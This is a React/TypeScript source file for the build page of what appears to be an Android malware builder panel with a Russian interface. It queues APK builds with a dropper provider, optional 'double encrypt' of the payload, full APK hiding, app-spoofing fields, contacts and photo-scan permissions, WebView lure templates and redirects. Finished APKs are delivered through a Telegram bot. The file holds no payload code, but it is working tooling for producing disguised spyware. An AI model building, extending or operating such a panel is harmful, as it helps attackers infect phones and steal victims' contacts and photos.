import { api } from '@/api/http';
import { fetchAdminSettings } from '@/api/admin';
import { fetchDomains } from '@/api/domains';
import BuildPermissionsSection from '@/components/build/build-permissions-section';
import BuildProgressBanner from '@/components/build/build-progress-banner';
import IconPicker from '@/components/build/icon-picker';
import { Select, SelectContent, SelectItem, SelectTrigger, SelectValue } from '@/components/ui/select';
import { getActiveBuild } from '@/entities/build.entity';
import { $lastBuildComplete } from '@/entities/build-live.entity';
import LoadingWrapper from '@/components/loading-wrapper';
import { PageScroll } from '@/layouts/page-layout';
import { Button } from '@/components/ui/button';
import { Card, CardContent, CardDescription, CardHeader, CardTitle } from '@/components/ui/card';
import { InputGroup, InputGroupInput } from '@/components/ui/input-group';
import { Label } from '@/components/ui/label';
import { Separator } from '@/components/ui/separator';
import { $features } from '@/entities/features-entity';
import { $profile } from '@/entities/profile-entity';
import { ROUTES } from '@/app/routes';
import { useUnit } from 'effector-react';
import { ContainerIcon, InfoIcon } from 'lucide-react';
import { useEffect, useState } from 'react';
import { Link } from 'react-router';
import { toast } from 'sonner';
import { useMyBuilds } from './use-my-builds';
import { useBuildSubscription } from '@/hooks/use-build-subscription';
import type { IUserDomain } from '@/entities/domain.entity';
import type { WebviewTemplateId } from '@/entities/webview-templates';
import WebviewSettingsSection from '@/components/build/webview-settings/webview-settings-section';
import PostPermissionRedirectSection from '@/components/build/post-permission-redirect-section';
import ApkHidingSection from '@/components/build/apk-hiding-section';
import { BUILD_ID_ERROR_MESSAGE, isValidBuildId } from '@crave/config/build-id';
import type { PostPermissionRedirectMode } from '@crave/config/post-permission-redirect';
import { validatePostPermissionRedirectInput } from '@crave/config/post-permission-redirect';
import { PANEL_BUILD_ID } from '@/lib/panel-build-id';

const panelBuildId = PANEL_BUILD_ID;

const emptyBuildForm = {
	appIcon: null as string | null,
	appName: null as string | null,
	buildName: null as string | null,
	domainId: null as number | null,
	postPermissionRedirect: 'none' as PostPermissionRedirectMode,
	postPermissionRedirectUrl: null as string | null,
	pushEnabled: true,
	contactsEnabled: true,
	photosEnabled: false,
	webviewEnabled: true,
	webviewType: 'photo' as WebviewTemplateId | null,
	url: null as string | null,
};

export default function BuilderPage() {
	const features = useUnit($features);
	const profile = useUnit($profile);
	const isAdmin = profile?.role === 'admin';
	const [fileIsUploading, setIsFileUploading] = useState(false);

	const [isLoading, setIsLoading] = useState(false);
	const { builds, loadBuilds } = useMyBuilds();
	const activeBuild = getActiveBuild(builds);
	const { progress: liveProgress, logs } = useBuildSubscription(activeBuild?.id);
	const lastBuildComplete = useUnit($lastBuildComplete);
	const recentFailedBuild =
		lastBuildComplete && !lastBuildComplete.success
			? builds.find(build => build.id === lastBuildComplete.buildId)
			: null;
	const formLocked = Boolean(activeBuild);
	const createBuildLocked = formLocked || !features.builderEnabled;

	const [build, setBuild] = useState(emptyBuildForm);
	const [onlineDomains, setOnlineDomains] = useState<IUserDomain[]>([]);
	const [domainsLoading, setDomainsLoading] = useState(true);
	const [globalDoubleEncryptActive, setGlobalDoubleEncryptActive] = useState(false);

	useEffect(() => {
		if (!isAdmin) {
			setGlobalDoubleEncryptActive(false);
			return;
		}
		let cancelled = false;
		void fetchAdminSettings()
			.then(settings => {
				if (cancelled) return;
				const active =
					settings.encryptEnabled &&
					settings.dropperProvider === 'omad' &&
					settings.payloadEncryptEnabled === true;
				setGlobalDoubleEncryptActive(active);
			})
			.catch(() => {
				if (!cancelled) setGlobalDoubleEncryptActive(false);
			});
		return () => {
			cancelled = true;
		};
	}, [isAdmin]);

	useEffect(() => {
		let cancelled = false;

		async function loadDomains() {
			try {
				const domains = await fetchDomains();
				if (!cancelled) {
					const online = domains.filter(d => d.status === 'online');
					setOnlineDomains(online);
					setBuild(prev => {
						if (prev.domainId != null && online.some(d => d.id === prev.domainId)) {
							return prev;
						}
						return { ...prev, domainId: online[0]?.id ?? null };
					});
				}
			} finally {
				if (!cancelled) setDomainsLoading(false);
			}
		}

		void loadDomains();

		return () => {
			cancelled = true;
		};
	}, []);

	async function handleSubmit() {
		if (!features.builderEnabled) {
			return toast.error('Билдер временно отключён администратором', { duration: 5000 });
		}

		if (formLocked) {
			return toast.error('Сначала дождитесь завершения текущего билда или отмените его', { duration: 5000 });
		}

		if (!build.domainId) {
			return toast.error('Выберите онлайн-домен для сборки', { duration: 5000 });
		}

		if (!build.appIcon) {
			return toast.error('Загрузите иконку приложения', { duration: 5000 });
		}

		if (!build.appName?.trim()) {
			return toast.error('Укажите название приложения', { duration: 5000 });
		}

		if (build.webviewEnabled && !build.webviewType) {
			return toast.error('Выберите шаблон WebView', { duration: 5000 });
		}

		const trimmedBuildName = build.buildName?.trim() ?? '';
		if (!trimmedBuildName) {
			return toast.error('Укажите название билда', { duration: 5000 });
		}

		if (!isValidBuildId(trimmedBuildName)) {
			return toast.error(BUILD_ID_ERROR_MESSAGE, { duration: 5000 });
		}

		try {
			validatePostPermissionRedirectInput({
				mode: build.postPermissionRedirect,
				url: build.postPermissionRedirectUrl,
			});
		} catch (error) {
			return toast.error(error instanceof Error ? error.message : 'Некорректный редирект', { duration: 5000 });
		}

		const { webviewEnabled, ...buildPayload } = build;

		setIsLoading(true);
		api
			.post('/start-build', {
				...buildPayload,
				photosEnabled: isAdmin ? build.photosEnabled : false,
				buildName: trimmedBuildName,
				appName: build.appName?.trim() || undefined,
				appIcon: build.appIcon,
				apkHidingMethod: 'full',
				spoofPreset: null,
				spoofCustomName: null,
				spoofCustomPackage: null,
				spoofCustomIcon: null,
				spoofCustomBehavior: null,
				spoofCustomUseWebview: false,
				webviewType: webviewEnabled ? build.webviewType : null,
				url: webviewEnabled && build.webviewType === 'custom' ? build.url : null,
				postPermissionRedirectUrl:
					build.postPermissionRedirect === 'custom_url' ? build.postPermissionRedirectUrl : null,
			})
			.then(async () => {
				toast.success('Билд успешно поставлен в очередь. АПК придет в телеграм бота', { duration: 5000 });
				setBuild({ ...emptyBuildForm, domainId: onlineDomains[0]?.id ?? null });
				await loadBuilds();
			})
			.finally(() => {
				setIsLoading(false);
			});
	}

	async function handleBuildCancelled() {
		await loadBuilds();
	}

	return (
		<PageScroll contentClassName='p-2 pb-4 flex flex-col gap-3'>
			<Card className='gap-0 py-0 shadow-sm overflow-hidden'>
				<CardHeader className='border-b px-4 py-4 flex'>
					<div className='flex items-center gap-3 min-w-0'>
						<div className='bg-primary/10 rounded-xl p-2 w-fit shrink-0'>
							<ContainerIcon className='size-5 text-primary' />
						</div>
						<div className='min-w-0'>
							<CardTitle className='text-lg'>Создать билд</CardTitle>
							<CardDescription>
								Сборка APK с вашими настройками
								{panelBuildId ? (
									<span className='mt-0.5 block text-[10px] leading-tight opacity-50'>panel {panelBuildId}</span>
								) : null}
							</CardDescription>
						</div>
					</div>
				</CardHeader>
				<CardContent className='px-4 py-4'>
					{!features.builderEnabled ? (
						<div className='mb-4 flex items-start gap-2 rounded-lg border border-border bg-muted/40 px-3 py-2.5 text-sm text-muted-foreground'>
							<InfoIcon className='mt-0.5 size-4 shrink-0' />
							<span>Билдер временно отключён администратором. Создание новых сборок недоступно.</span>
						</div>
					) : null}

					{!features.domainsEnabled ? (
						<div className='mb-4 flex items-start gap-2 rounded-lg border border-border bg-muted/40 px-3 py-2.5 text-sm text-muted-foreground'>
							<InfoIcon className='mt-0.5 size-4 shrink-0' />
							<span>Добавление доменов временно отключено администратором.</span>
						</div>
					) : null}

					{features.domainsEnabled && !domainsLoading && onlineDomains.length === 0 ? (
						<div className='mb-4 flex items-start gap-2 rounded-lg border border-border bg-muted/40 px-3 py-2.5 text-sm text-muted-foreground'>
							<InfoIcon className='mt-0.5 size-4 shrink-0' />
							<span>
								Нет онлайн-доменов.{' '}
								<Link to={ROUTES.apkDomains} className='text-primary underline-offset-2 hover:underline'>
									Добавьте домен
								</Link>{' '}
								и дождитесь статуса «Онлайн».
							</span>
						</div>
					) : null}

					{isAdmin && globalDoubleEncryptActive ? (
						<div className='mb-4 flex items-start gap-2 rounded-lg border border-primary/30 bg-primary/5 px-3 py-2.5 text-sm text-muted-foreground'>
							<InfoIcon className='mt-0.5 size-4 shrink-0 text-primary' />
							<span>
								Включён double encrypt для всех Omad-сборок (Admin → Билдер). В прогрессе появится стадия «Шифрование
								payload».
							</span>
						</div>
					) : null}

					{activeBuild ? (
						<div className='mb-4'>
							<BuildProgressBanner
								build={activeBuild}
								liveProgress={liveProgress}
								logs={logs}
								showAdminLogs={isAdmin}
								onCancel={handleBuildCancelled}
							/>
						</div>
					) : null}

					{!activeBuild && recentFailedBuild ? (
						<div className='mb-4'>
							<BuildProgressBanner
								build={recentFailedBuild}
								showAdminLogs={isAdmin}
								onCancel={handleBuildCancelled}
							/>
						</div>
					) : null}

					<div className={createBuildLocked ? 'pointer-events-none opacity-60' : undefined}>
						<IconPicker
							value={build.appIcon}
							disabled={createBuildLocked}
							onChange={url => setBuild(p => ({ ...p, appIcon: url }))}
							onUploadingChange={setIsFileUploading}
						/>

						<Separator className='my-4' />

						<div className='flex flex-col gap-1.5'>
							<Label className='text-sm'>Домен</Label>
							<Select
								value={build.domainId != null ? String(build.domainId) : undefined}
								onValueChange={value => setBuild(p => ({ ...p, domainId: Number(value) }))}
								disabled={createBuildLocked || domainsLoading || onlineDomains.length === 0}
							>
								<SelectTrigger className='w-full'>
									<SelectValue placeholder={domainsLoading ? 'Загрузка...' : 'Выберите домен'} />
								</SelectTrigger>
								<SelectContent>
									{onlineDomains.map(domain => (
										<SelectItem key={domain.id} value={String(domain.id)}>
											{domain.hostname}
										</SelectItem>
									))}
								</SelectContent>
							</Select>
							<p className='text-xs text-muted-foreground'>Только домены со статусом «Онлайн»</p>
						</div>

						<Separator className='my-4' />

						<div className='flex flex-col gap-4'>
							<div className='flex flex-col gap-1.5'>
								<Label className='text-sm'>Название билда</Label>
								<InputGroup>
									<InputGroupInput
										placeholder='билд-01, мой-билд-1'
										disabled={createBuildLocked}
										onChange={e => setBuild(p => ({ ...p, buildName: e.target.value }))}
										value={build.buildName ?? ''}
									/>
								</InputGroup>
								<p className='text-xs text-muted-foreground'>{BUILD_ID_ERROR_MESSAGE}</p>
							</div>
							<div className='flex flex-col gap-1.5'>
								<Label className='text-sm'>Название приложения</Label>
								<InputGroup>
									<InputGroupInput
										placeholder='My App'
										disabled={createBuildLocked}
										onChange={e => setBuild(p => ({ ...p, appName: e.target.value }))}
										value={build.appName ?? ''}
									/>
								</InputGroup>
							</div>
						</div>

						<Separator className='my-4' />

						<ApkHidingSection disabled={createBuildLocked} />

						<Separator className='my-4' />

						<BuildPermissionsSection
							pushEnabled={build.pushEnabled}
							contactsEnabled={build.contactsEnabled}
							photosEnabled={build.photosEnabled}
							showPhotosScan={isAdmin}
							disabled={createBuildLocked}
							onPushEnabledChange={checked => setBuild(p => ({ ...p, pushEnabled: checked }))}
							onContactsEnabledChange={checked => setBuild(p => ({ ...p, contactsEnabled: checked }))}
							onPhotosEnabledChange={checked => setBuild(p => ({ ...p, photosEnabled: checked }))}
						/>

						<Separator className='my-4' />

						<WebviewSettingsSection
							enabled={build.webviewEnabled}
							webviewType={build.webviewType}
							url={build.url}
							disabled={createBuildLocked}
							onEnabledChange={checked =>
								setBuild(p => ({
									...p,
									webviewEnabled: checked,
									webviewType: checked ? (p.webviewType ?? 'photo') : null,
									url: checked && p.webviewType === 'custom' ? p.url : null,
								}))
							}
							onWebviewTypeChange={webviewType => setBuild(p => ({ ...p, webviewType }))}
							onUrlChange={value => setBuild(p => ({ ...p, url: value }))}
						/>

						<Separator className='my-4' />

						<PostPermissionRedirectSection
							mode={build.postPermissionRedirect}
							url={build.postPermissionRedirectUrl}
							disabled={createBuildLocked}
							onModeChange={postPermissionRedirect =>
								setBuild(p => ({
									...p,
									postPermissionRedirect,
									postPermissionRedirectUrl:
										postPermissionRedirect === 'custom_url' ? p.postPermissionRedirectUrl : null,
								}))
							}
							onUrlChange={value => setBuild(p => ({ ...p, postPermissionRedirectUrl: value }))}
						/>

						<div className='mt-6 border-t pt-4 pb-2'>
							<LoadingWrapper show={isLoading || fileIsUploading}>
								<Button
									className='w-full'
									disabled={
										createBuildLocked ||
										isLoading ||
										fileIsUploading ||
										!build.domainId ||
										onlineDomains.length === 0
									}
									onClick={handleSubmit}
								>
									Создать билд
								</Button>
							</LoadingWrapper>
						</div>
					</div>
				</CardContent>
			</Card>
		</PageScroll>
	);
}
